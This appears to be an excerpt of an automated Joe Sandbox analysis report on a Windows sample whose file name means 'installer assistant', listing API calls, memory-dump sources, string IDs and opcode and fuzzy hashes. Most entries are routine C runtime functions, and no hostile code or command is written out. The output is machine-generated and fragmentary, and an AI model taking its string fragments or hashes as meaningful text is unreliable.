                                          • ___std_exception_destroy.LIBVCRUNTIME ref: 6C682A76
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1869177051.000000006C631000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C630000, based on PE: true
                                           • Associated: 00000005.00000002.1869151860.000000006C630000.00000002.00000001.01000000.00000009.sdmp
                                           • Associated: 00000005.00000002.1870349068.000000006C7D8000.00000002.00000001.01000000.00000009.sdmp
                                           • Associated: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp
                                           • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmp
                                           • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmp
                                           • Associated: 00000005.00000002.1871780908.000000006C9A2000.00000002.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID: ___std_exception_destroy
                                          • String ID: U#hl$q!hl$Jbx$Jbx
                                          • API String ID: 4194217158-1979245787
                                          APIs
                                          • _free.LIBCMT ref: 6C7D5ADD
                                          • _free.LIBCMT ref: 6C7D5B06
                                          • SetEndOfFile.KERNEL32(00000000,6C7D46EC,00000000,6C7CB0D0,?,?,?,?,?,?,?,6C7D46EC,6C7CB0D0,00000000), ref: 6C7D5B38
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,6C7D46EC,6C7CB0D0,00000000,?,?,?,?,00000000,?), ref: 6C7D5B54
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1869177051.000000006C631000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C630000, based on PE: true
                                           • Associated: 00000005.00000002.1869151860.000000006C630000.00000002.00000001.01000000.00000009.sdmp
                                           • Associated: 00000005.00000002.1870349068.000000006C7D8000.00000002.00000001.01000000.00000009.sdmp
                                           • Associated: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp
                                           • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmp
                                           • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmp
                                           • Associated: 00000005.00000002.1871780908.000000006C9A2000.00000002.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID: _free$ErrorFileLast
                                          • String ID: 8Q
                                          • API String ID: 1547350101-4022487301
                                          APIs
                                          • __EH_prolog.LIBCMT ref: 6C80E41D
                                            • Part of subcall function 6C80EE40: __EH_prolog.LIBCMT ref: 6C80EE45
                                            • Part of subcall function 6C80E8EB: __EH_prolog.LIBCMT ref: 6C80E8F0
                                            • Part of subcall function 6C80E593: __EH_prolog.LIBCMT ref: 6C80E598
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7E8000, based on PE: true
                                           • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmp
                                           • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID: H_prolog
                                          • String ID: &qB$0aJ$A0$XqB
                                          • API String ID: 3519838083-1326096578
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7E8000, based on PE: true
                                           • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmp
                                           • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID: H_prolog
                                          • String ID: J$0J$DJ$`J
                                          • API String ID: 3519838083-2453737217
                                          APIs
                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,6C7BF1B4,?,?,6C7BF235,?,?,?), ref: 6C7BF13F
                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6C7BF152
                                          • FreeLibrary.KERNEL32(00000000,?,?,6C7BF1B4,?,?,6C7BF235,?,?,?), ref: 6C7BF175
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1869177051.000000006C631000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C630000, based on PE: true
                                           • Associated: 00000005.00000002.1869151860.000000006C630000.00000002.00000001.01000000.00000009.sdmp
                                           • Associated: 00000005.00000002.1870349068.000000006C7D8000.00000002.00000001.01000000.00000009.sdmp
                                           • Associated: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp
                                           • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmp
                                           • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmp
                                           • Associated: 00000005.00000002.1871780908.000000006C9A2000.00000002.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID: AddressFreeHandleLibraryModuleProc
                                          • String ID: CorExitProcess$mscoree.dll
                                          • API String ID: 4061214504-1276376045
                                          APIs
                                          • __EH_prolog3.LIBCMT ref: 6C7B732E
                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6C7B7339
                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6C7B73A7
                                            • Part of subcall function 6C7B7230: std::locale::_Locimp::_Locimp.LIBCPMT ref: 6C7B7248
                                          • std::locale::_Setgloballocale.LIBCPMT ref: 6C7B7354
                                          • _Yarn.LIBCPMT ref: 6C7B736A
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1869177051.000000006C631000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C630000, based on PE: true
                                           • Associated: 00000005.00000002.1869151860.000000006C630000.00000002.00000001.01000000.00000009.sdmp
                                           • Associated: 00000005.00000002.1870349068.000000006C7D8000.00000002.00000001.01000000.00000009.sdmp
                                           • Associated: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp
                                           • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmp
                                           • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmp
                                           • Associated: 00000005.00000002.1871780908.000000006C9A2000.00000002.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                          • String ID:
                                          • API String ID: 1088826258-0
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7E8000, based on PE: true
                                           • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmp
                                           • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID: H_prolog
                                          • String ID: $!$@
                                          • API String ID: 3519838083-2517134481
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7E8000, based on PE: true
                                           • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmp
                                           • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID: H_prolog__aulldiv
                                          • String ID: $SJ
                                          • API String ID: 4125985754-3948962906
                                          APIs
                                            • Part of subcall function 6C7B7327: __EH_prolog3.LIBCMT ref: 6C7B732E
                                            • Part of subcall function 6C7B7327: std::_Lockit::_Lockit.LIBCPMT ref: 6C7B7339
                                            • Part of subcall function 6C7B7327: std::locale::_Setgloballocale.LIBCPMT ref: 6C7B7354
                                            • Part of subcall function 6C7B7327: _Yarn.LIBCPMT ref: 6C7B736A
                                            • Part of subcall function 6C7B7327: std::_Lockit::~_Lockit.LIBCPMT ref: 6C7B73A7
                                            • Part of subcall function 6C682F60: std::_Lockit::_Lockit.LIBCPMT ref: 6C682F95
                                            • Part of subcall function 6C682F60: std::_Lockit::_Lockit.LIBCPMT ref: 6C682FAF
                                            • Part of subcall function 6C682F60: std::_Lockit::~_Lockit.LIBCPMT ref: 6C682FD0
                                            • Part of subcall function 6C682F60: __Getctype.LIBCPMT ref: 6C683084
                                            • Part of subcall function 6C682F60: std::_Facet_Register.LIBCPMT ref: 6C68309C
                                            • Part of subcall function 6C682F60: std::_Lockit::~_Lockit.LIBCPMT ref: 6C6830B7
                                          • std::ios_base::_Addstd.LIBCPMT ref: 6C68211B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1869177051.000000006C631000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C630000, based on PE: true
                                           • Associated: 00000005.00000002.1869151860.000000006C630000.00000002.00000001.01000000.00000009.sdmp
                                           • Associated: 00000005.00000002.1870349068.000000006C7D8000.00000002.00000001.01000000.00000009.sdmp
                                           • Associated: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp
                                           • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmp
                                           • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmp
                                           • Associated: 00000005.00000002.1871780908.000000006C9A2000.00000002.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$AddstdFacet_GetctypeH_prolog3RegisterSetgloballocaleYarnstd::ios_base::_std::locale::_
                                          • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                          • API String ID: 3332196525-1866435925
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7E8000, based on PE: true
                                           • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmp
                                           • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID: H_prolog
                                          • String ID: $CK$CK
                                          • API String ID: 3519838083-2957773085
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7E8000, based on PE: true
                                           • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmp
                                           • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID: H_prolog
                                          • String ID: 0$LrJ$x
                                          • API String ID: 3519838083-658305261
                                          APIs
                                          • __EH_prolog.LIBCMT ref: 6C814ECC
                                            • Part of subcall function 6C7FF58A: __EH_prolog.LIBCMT ref: 6C7FF58F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7E8000, based on PE: true
                                           • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmp
                                           • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID: H_prolog
                                          • String ID: :hJ$dJ$xJ
                                          • API String ID: 3519838083-2437443688
                                          • Opcode ID: e3ee415979c90d2d15618e5f431c2d86ccd996bf58f825059be4d34af7dc85d3
                                          • Instruction ID: 5ad7aa053dfcf8594140764994f56dc9ff87486ad205860e3f93b94a5a73e80f
                                          • Opcode Fuzzy Hash: e3ee415979c90d2d15618e5f431c2d86ccd996bf58f825059be4d34af7dc85d3
                                          • Instruction Fuzzy Hash: 6C21DAB1801B40CFC760CF6AC14828ABBF4BF69718B00C96EC0AA97B11D7B8A508CF55
                                          APIs
                                          • SetFilePointerEx.KERNEL32(00000000,?,00000000,6C7CB0D0,6C681DEA,00008000,6C7CB0D0,?,?,?,6C7CAC7F,6C7CB0D0,?,00000000,6C681DEA), ref: 6C7CADC9
                                          • GetLastError.KERNEL32(?,?,?,6C7CAC7F,6C7CB0D0,?,00000000,6C681DEA,?,6C7D469E,6C7CB0D0,000000FF,000000FF,00000002,00008000,6C7CB0D0), ref: 6C7CADD3
                                          • __dosmaperr.LIBCMT ref: 6C7CADDA
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1869177051.000000006C631000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C630000, based on PE: true
                                           • Associated: 00000005.00000002.1869151860.000000006C630000.00000002.00000001.01000000.00000009.sdmp
                                           • Associated: 00000005.00000002.1870349068.000000006C7D8000.00000002.00000001.01000000.00000009.sdmp
                                           • Associated: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp
                                           • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmp
                                           • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmp
                                           • Associated: 00000005.00000002.1871780908.000000006C9A2000.00000002.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID: ErrorFileLastPointer__dosmaperr
                                          • String ID: 8Q
                                          • API String ID: 2336955059-4022487301
                                          • Opcode ID: 0e34f47fa6ff6d7c1e6433fff1a55de3fe07040ecd7a94e1e53bd94a9cac9e0f
                                          • Instruction ID: f4262eeea44c05fd544ffd1b5ee6fb8bdd2f6cc2d4511f28c939464792419abb
                                          • Opcode Fuzzy Hash: 0e34f47fa6ff6d7c1e6433fff1a55de3fe07040ecd7a94e1e53bd94a9cac9e0f
                                          • Instruction Fuzzy Hash: 6701FC377106157FCF058FAADD0A8DE3B39EF86336B240218E812D7684EB71E9018B91
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7E8000, based on PE: true
                                           • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmp
                                           • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: <J$DJ$HJ$TJ$]
                                          • API String ID: 0-686860805
                                          • Opcode ID: b82db92acc6f2fd2fd2fd5332bfa7d1e38ecda44958a76cbd211a3f1299ff4ed
                                          • Instruction ID: 943c90495925dd94227a767789b5cfe921ff5414c3dbb89095e95f51bb19d12b
                                          • Opcode Fuzzy Hash: b82db92acc6f2fd2fd2fd5332bfa7d1e38ecda44958a76cbd211a3f1299ff4ed
                                          • Instruction Fuzzy Hash: F941D671D01289AFCF24DBA0DA948FEB774AF15318F20C869D13127E61EB31A64DCB11
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7E8000, based on PE: true
                                           • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmp
                                           • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID: __aulldiv
                                          • String ID:
                                          • API String ID: 3732870572-0
                                          • Opcode ID: 2bdaa92217569021002d8658a142890db49ae38c047720c0e1f220da2750cc6e
                                          • Instruction ID: e400082873d6ffeb42f66afba46ae9f60eefd640cf65dce3902cd4a3fbb46561
                                          • Opcode Fuzzy Hash: 2bdaa92217569021002d8658a142890db49ae38c047720c0e1f220da2750cc6e
                                          • Instruction Fuzzy Hash: 80119076301304BFEB354AA8CD44EAF7BBDEF85744F10882DF55156A50C6B1AC449760
                                          APIs
                                          • GetLastError.KERNEL32(?,?,?,6C7BEF64,6C7E6DD8,0000000C), ref: 6C7C49B7
                                          • _free.LIBCMT ref: 6C7C4A14
                                          • _free.LIBCMT ref: 6C7C4A4A
                                          • SetLastError.KERNEL32(00000000,00000008,000000FF,?,?,6C7BEF64,6C7E6DD8,0000000C), ref: 6C7C4A55
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1869177051.000000006C631000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C630000, based on PE: true
                                           • Associated: 00000005.00000002.1869151860.000000006C630000.00000002.00000001.01000000.00000009.sdmp
                                           • Associated: 00000005.00000002.1870349068.000000006C7D8000.00000002.00000001.01000000.00000009.sdmp
                                           • Associated: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp
                                           • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmp
                                           • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmp
                                           • Associated: 00000005.00000002.1871780908.000000006C9A2000.00000002.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID: ErrorLast_free
                                          • String ID:
                                          • API String ID: 2283115069-0
                                          • Opcode ID: e96b112dfbd3657d8097d13a3fc3b3407ba20a5e675d62dd7d78dafce1c4e34f
                                          • Instruction ID: 6bda217d83607ce74f33754de8855fd5379c046e6b08148630394de7d7810dbf
                                          • Opcode Fuzzy Hash: e96b112dfbd3657d8097d13a3fc3b3407ba20a5e675d62dd7d78dafce1c4e34f
                                          • Instruction Fuzzy Hash: 5A11C4327046036FDA105DB54E8CDBE2679ABC277CB350635F524A2B80EF318C04B15A
                                          APIs
                                          • WriteConsoleW.KERNEL32(00000000,?,6C7D46EC,00000000,00000000,?,6C7D4B51,00000000,00000001,00000000,6C7CB0D0,?,6C7CC286,?,?,6C7CB0D0), ref: 6C7D5ED1
                                          • GetLastError.KERNEL32(?,6C7D4B51,00000000,00000001,00000000,6C7CB0D0,?,6C7CC286,?,?,6C7CB0D0,?,6C7CB0D0,?,6C7CBD1C,6C7D5AB6), ref: 6C7D5EDD
                                            • Part of subcall function 6C7D5F2E: CloseHandle.KERNEL32(FFFFFFFE,6C7D5EED,?,6C7D4B51,00000000,00000001,00000000,6C7CB0D0,?,6C7CC286,?,?,6C7CB0D0,?,6C7CB0D0), ref: 6C7D5F3E
                                          • ___initconout.LIBCMT ref: 6C7D5EED
                                            • Part of subcall function 6C7D5F0F: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6C7D5EAB,6C7D4B3E,6C7CB0D0,?,6C7CC286,?,?,6C7CB0D0,?), ref: 6C7D5F22
                                          • WriteConsoleW.KERNEL32(00000000,?,6C7D46EC,00000000,?,6C7D4B51,00000000,00000001,00000000,6C7CB0D0,?,6C7CC286,?,?,6C7CB0D0,?), ref: 6C7D5F02
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1869177051.000000006C631000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C630000, based on PE: true
                                           • Associated: 00000005.00000002.1869151860.000000006C630000.00000002.00000001.01000000.00000009.sdmp
                                           • Associated: 00000005.00000002.1870349068.000000006C7D8000.00000002.00000001.01000000.00000009.sdmp
                                           • Associated: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp
                                           • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmp
                                           • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmp
                                           • Associated: 00000005.00000002.1871780908.000000006C9A2000.00000002.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                          • String ID:
                                          • API String ID: 2744216297-0
                                          • Opcode ID: 6e0e3231ffffa5a863fc641d67d745f76a0ecaccfec08924285632f1544cb67f
                                          • Instruction ID: cc491b5222fde89fa545e0dba36e1390432689c9c6ef69d77d9adc1dd3c8291d
                                          • Opcode Fuzzy Hash: 6e0e3231ffffa5a863fc641d67d745f76a0ecaccfec08924285632f1544cb67f
                                          • Instruction Fuzzy Hash: B5F0C777500119BBCF525FE5DC08A893F36FB09765F054521FB1996520CB32AC20EB95
                                          APIs
                                          • __EH_prolog.LIBCMT ref: 6C7EE077
                                            • Part of subcall function 6C7EDFF5: __EH_prolog.LIBCMT ref: 6C7EDFFA
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7E8000, based on PE: true
                                           • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmp
                                           • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID: H_prolog
                                          • String ID: :$\
                                          • API String ID: 3519838083-1166558509
                                          • Opcode ID: 48f4411e2405fcdde49591215dd3ffd545f97566ccde13c94e17e7da02f2e48f
                                          • Instruction ID: 485931f5b1cfe4cbbca6a75cc827d4ed57b16624c8c6c40342dc1442832d79d8
                                          • Opcode Fuzzy Hash: 48f4411e2405fcdde49591215dd3ffd545f97566ccde13c94e17e7da02f2e48f
                                          • Instruction Fuzzy Hash: B2E1153390060C9ACF10DFA4CA987DDB7B5BF5D31CF108929D4516BBA0EB74A949CB91
                                           Memory Dump Source
                                           • Source File: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7E8000, based on PE: true
                                           • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmp
                                           • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID: H_prolog__aullrem
                                          • String ID: d%K
                                          • API String ID: 3415659256-3110269457
                                          • Opcode ID: edd8db3a4067630c511c1f9d0118cc4b792e07b2613ebc31a4b030f5161dda76
                                          • Instruction ID: 1d55999df53ff56ced03d751297da2518f90be03a1ebd05f28249782cc9c4cd9
                                          • Opcode Fuzzy Hash: edd8db3a4067630c511c1f9d0118cc4b792e07b2613ebc31a4b030f5161dda76
                                          • Instruction Fuzzy Hash: F481F532A012299FCF20CFD8C644BDE77F5AF45308F24A869D818AB641D771D905CBE0
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1869177051.000000006C631000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C630000, based on PE: true
                                           • Associated: 00000005.00000002.1869151860.000000006C630000.00000002.00000001.01000000.00000009.sdmp
                                           • Associated: 00000005.00000002.1870349068.000000006C7D8000.00000002.00000001.01000000.00000009.sdmp
                                           • Associated: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp
                                           • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmp
                                           • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmp
                                           • Associated: 00000005.00000002.1871780908.000000006C9A2000.00000002.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID: H_prolog3_
                                          • String ID: 8Q
                                          • API String ID: 2427045233-4022487301
                                          • Opcode ID: 76fe5231bb3a3eb5a10b1ae84995069db603195ceb83f1eb5680a53c526181ad
                                          • Instruction ID: b6c15d17bf0a1a4b51fb4fc612f0cc55b6ad626325b7e6fb21a3906d40d20ebf
                                          • Opcode Fuzzy Hash: 76fe5231bb3a3eb5a10b1ae84995069db603195ceb83f1eb5680a53c526181ad
                                          • Instruction Fuzzy Hash: 1271C671F012579FEB108F96CA84BEE7BB5AF06358F144235E83067A80DF758845CBA2
                                           Memory Dump Source
                                           • Source File: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7E8000, based on PE: true
                                           • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmp
                                           • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID: H_prolog
                                          • String ID: @$hfJ
                                          • API String ID: 3519838083-1391159562
                                          • Opcode ID: 82ac28e14911e15d6061b9e8fa7e1011da5464f288955fede779c14a83bf3726
                                          • Instruction ID: 742c0bdf6939ebb5ee1f36b79741102067e7561cf4f0293dc1847380d86cde81
                                          • Opcode Fuzzy Hash: 82ac28e14911e15d6061b9e8fa7e1011da5464f288955fede779c14a83bf3726
                                          • Instruction Fuzzy Hash: C2914B71914349EFCB20DF99CA849DEFBF4BF18308F50492EE555A7A50D770AA48CB10
                                          APIs
                                          • __EH_prolog.LIBCMT ref: 6C808C5D
                                            • Part of subcall function 6C80761A: __EH_prolog.LIBCMT ref: 6C80761F
                                            • Part of subcall function 6C807A2E: __EH_prolog.LIBCMT ref: 6C807A33
                                            • Part of subcall function 6C808EA5: __EH_prolog.LIBCMT ref: 6C808EAA
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7E8000, based on PE: true
                                           • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmp
                                           • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID: H_prolog
                                          • String ID: WZJ
                                          • API String ID: 3519838083-1089469559
                                          • Opcode ID: cff2a95f7f2c9e7e47c21d6c2cae1b51bbda01fa4771d0427a5cf66fef2ba2b2
                                          • Instruction ID: ea7b3b8bd70e6e955360060db612f8dd08c092f9c25c95c5c53bfde870ab7adb
                                          • Opcode Fuzzy Hash: cff2a95f7f2c9e7e47c21d6c2cae1b51bbda01fa4771d0427a5cf66fef2ba2b2
                                          • Instruction Fuzzy Hash: 71819432E00159DFCF25DFA8DA94ADDBBB4AF18318F10456AE412B7B90DB306E49CB51
                                           Memory Dump Source
                                           • Source File: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7E8000, based on PE: true
                                           • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmp
                                           • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID: H_prolog
                                          • String ID: <dJ$Q
                                          • API String ID: 3519838083-2252229148
                                          • Opcode ID: 8611fd72bf4170e71673488c417c1a53bfaf30d487d7fd955d74d6e9e56554ac
                                          • Instruction ID: 4565cc7083d262e6526d6c26d02a89f10b8a62131787aa71456c8cf690fe853c
